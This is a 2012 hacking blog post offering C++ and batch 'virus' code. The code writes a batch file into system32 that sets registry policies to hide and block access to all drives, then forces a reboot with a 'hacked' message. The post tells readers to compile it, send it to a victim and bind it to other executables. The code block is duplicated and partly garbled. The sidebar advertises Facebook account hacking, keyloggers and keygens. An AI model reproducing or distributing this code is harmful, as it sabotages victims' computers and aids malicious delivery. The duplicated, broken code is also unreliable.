Search This Blog
Categories
- Games (1)
- Hack Facebook (7)
- Hacker News (3)
- Internet Hacks (2)
- Keylogger (4)
- Password Cracking (1)
- Programming (3)
- Security Tips (2)
- Tools (3)
Blog Archive
-
2012
(24)
-
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
October
(24)
Ads 468x60px
Social Icons
?
+
X
Recommended for you
Loading..
loading
Featured Posts
Saturday, October 20, 2012
C++ ,Batch Virus code to disable All Hard disk
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.
Batch Virus Code Creation:
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Labels:Programming
Subscribe to:
Post Comments
(Atom)
Archives
-
▼
2012
(24)
-
▼
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
▼
October
(24)
Blogroll
Top Read
-
EA Games Generic Multi KeyGen v214 .exe File Format (KeyGen) EA Games Keygen is a powerful Keygen, that can generate product keys for...
-
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batc...
-
A new facebook hacking tool is released . It can steal the information from victims like photos,friendslist and other information. Using t...
-
An easy to use SQL injection tool for retrieving database informations from a distant server. jSQL Injection features: GET, POST, he...
-
The hacker group known as LulzSecperu , have breached server belong to one of the biggest Peru Domains provider , www.punto.pe and released ...
-
Requriments: Lot of Friends :Ravan is Distributed password cracking method. So you will need lot of friends who have Pc with Internet conne...
-
Few days back, I posted an article How to hack someones Facebook which explains one of the best methods useful to hack a Facebook acc...
-
The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The g...
-
Earlier Today, we reported that the HSBC online banking site disrupted by Denial-of-service attack. Initially, we believe that the cybe...
-
In my last post, i explained how to insert HTML button in faecbook statu s. Now we are going to see some other Facebook Tricks using XFB...
0 comments:
Post a Comment